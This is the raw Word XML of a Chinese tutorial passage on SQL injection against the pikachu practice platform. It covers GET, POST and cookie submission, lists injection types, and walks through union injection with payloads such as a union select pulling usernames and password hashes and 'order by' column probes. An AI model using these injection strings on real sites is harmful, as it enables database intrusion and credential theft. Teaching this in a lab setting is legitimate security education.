          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00595538">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>get提交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2055A8" w14:textId="77777777" w:rsidR="00856B8B" w:rsidRDefault="00E04B51" w:rsidP="00856B8B">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一般直接通过浏览器地址栏提交，如下</w:t>
      </w:r>
      <w:r w:rsidR="00912A46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidR="00856B8B" w:rsidRPr="006F519C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8307B6" w14:textId="77777777" w:rsidR="00912A46" w:rsidRPr="006F519C" w:rsidRDefault="00912A46" w:rsidP="00856B8B">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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C711FBD" wp14:editId="5ADB5978">
            <wp:extent cx="5278120" cy="3688271"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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8120" cy="3688271"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CBD0B8" w14:textId="77777777" w:rsidR="00595538" w:rsidRPr="009E7F7C" w:rsidRDefault="00595538" w:rsidP="00595538">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07735D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0007735D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>post提交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06130993" w14:textId="77777777" w:rsidR="00595538" w:rsidRDefault="00E04B51" w:rsidP="00595538">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可通过安装火狐浏览器插件（</w:t>
      </w:r>
      <w:r w:rsidR="00912A46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hackbar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）或Burp工具来完成，如</w:t>
      </w:r>
      <w:r w:rsidR="00912A46">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23630101" w14:textId="77777777" w:rsidR="00E04B51" w:rsidRPr="00E04B51" w:rsidRDefault="00912A46" w:rsidP="00595538">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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C043932" wp14:editId="3912FC85">
            <wp:extent cx="5278120" cy="3710000"/>
            <wp:effectExtent l="19050" t="0" r="0"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78120" cy="3710000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A4A79" w14:textId="77777777" w:rsidR="00595538" w:rsidRPr="009E7F7C" w:rsidRDefault="00595538" w:rsidP="00595538">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1.</w:t>
      </w:r>
      <w:r w:rsidR="0007735D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0007735D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cookie提交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977C5E4" w14:textId="77777777" w:rsidR="00E04B51" w:rsidRDefault="00912A46" w:rsidP="00E04B51">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>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一般通</w:t>
      </w:r>
      <w:r w:rsidR="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Burp工具来完成，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>下图</w:t>
      </w:r>
      <w:r w:rsidR="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFB60A" w14:textId="77777777" w:rsidR="004067BA" w:rsidRDefault="00912A46" w:rsidP="00A2480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286E4D7D" wp14:editId="2A9F7FB7">
            <wp:extent cx="5278120" cy="2140344"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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8120" cy="2140344"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41275B00" w14:textId="77777777" w:rsidR="006029FC" w:rsidRDefault="006029FC" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDADFC7" w14:textId="77777777" w:rsidR="006029FC" w:rsidRDefault="006029FC" w:rsidP="006029FC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="0007735D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidR="00E2762A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>类型与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C7986D" w14:textId="77777777" w:rsidR="006029FC" w:rsidRPr="00A77CF1" w:rsidRDefault="00A77CF1" w:rsidP="00A77CF1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A77CF1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>主要有：</w:t>
      </w:r>
      <w:r w:rsidR="00215514">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>union注入、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77CF1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>insert/update注入、delete注入、http header注入、盲注(base on boolian)、盲注(base on time)、函数报错、宽字节注入、二次注入、偏移注入等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F8436" w14:textId="77777777" w:rsidR="00215514" w:rsidRPr="009E7F7C" w:rsidRDefault="00215514" w:rsidP="00215514">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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFD3C7" w14:textId="77777777" w:rsidR="00215514" w:rsidRDefault="00D07F08" w:rsidP="00215514">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>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ab/>
      </w:r>
      <w:r w:rsidR="00215514" w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>union操作符用于合并两个或多个SQL语句集合起来，得到联合的查询结果。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>下面</w:t>
      </w:r>
      <w:r w:rsidR="00215514" w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>以pikachu平台的数据库为例，输入</w:t>
      </w:r>
      <w:r w:rsidR="00215514" w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>select id,email from member where username='kevin' union select username,pw from member where id=1;</w:t>
      </w:r>
      <w:r w:rsidR="00215514" w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>查询结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C29B3" w14:textId="77777777" w:rsidR="00D07F08" w:rsidRPr="00744573" w:rsidRDefault="00744573" w:rsidP="00215514">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744573">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>注：union操作符一般与order by语句配合使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8788A"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mysql&gt; select id,email from member where username='kevin' union select username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68352F08"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pw from member where id=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5A2B22"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35A067"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 id    | email                            |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D575C37"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79B127"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 5     | kevin@pikachu.com                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268DF2B8"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 vince | e10adc3949ba59abbe56e057f20f883e |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5569C" w14:textId="77777777" w:rsidR="00D07F08" w:rsidRPr="00D07F08" w:rsidRDefault="00D07F08" w:rsidP="00D07F08">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F86961" w14:textId="77777777" w:rsidR="0007735D" w:rsidRPr="00D07F08" w:rsidRDefault="00D07F08" w:rsidP="00D07F08">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEF6563" w14:textId="77777777" w:rsidR="0007735D" w:rsidRDefault="008F76EB" w:rsidP="006029FC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>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lastRenderedPageBreak/>
        <w:t>返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07F08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pikachu平台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，输入以上语句，出现如下报错：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1154D2" w14:textId="77777777" w:rsidR="008D5EF3" w:rsidRPr="008D5EF3" w:rsidRDefault="008F76EB" w:rsidP="006029FC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>v' union select username,pw from member where id=1</w:t>
      </w:r>
      <w:r w:rsidR="008D5EF3" w:rsidRPr="008D5EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EFA533" w14:textId="77777777" w:rsidR="0007735D" w:rsidRDefault="008D5EF3" w:rsidP="006029FC">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43F35803" wp14:editId="69843E55">
            <wp:extent cx="5278120" cy="642350"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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8120" cy="642350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1761D" w14:textId="77777777" w:rsidR="008D5EF3" w:rsidRDefault="008D5EF3" w:rsidP="006029FC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>因为查询的字段不能超过主查询的字段，这个时候可以在SQL语句后面加</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>order by</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进行排序，通过这个办法可以判断主查询的字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CEF2F" w14:textId="77777777" w:rsidR="00B81EFF" w:rsidRPr="00B81EFF" w:rsidRDefault="00B81EFF" w:rsidP="00B81EFF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="337" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B81EFF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81EFF">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:eastAsia="宋体" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>a' order by 4#%</w:t>
      </w:r>
      <w:r w:rsidRPr="00B81EFF">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，反馈如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B09DD7" w14:textId="77777777" w:rsidR="00B81EFF" w:rsidRDefault="00B81EFF" w:rsidP="006029FC">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11583B84" wp14:editId="00EFFB5E">
            <wp:extent cx="5278120" cy="1010632"/>
            <wp:effectExtent l="19050" t="0" r="0"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278120" cy="1010632"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A40AB0" w14:textId="77777777" w:rsidR="00B81EFF" w:rsidRDefault="00B81EFF" w:rsidP="006029FC">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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>a' order by 3#%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，反馈如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303AC3A7" w14:textId="77777777" w:rsidR="00B81EFF" w:rsidRDefault="00B81EFF" w:rsidP="006029FC">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118AF269" wp14:editId="1A824E89">
            <wp:extent cx="5278120" cy="1872960"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1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78120" cy="1872960"/>
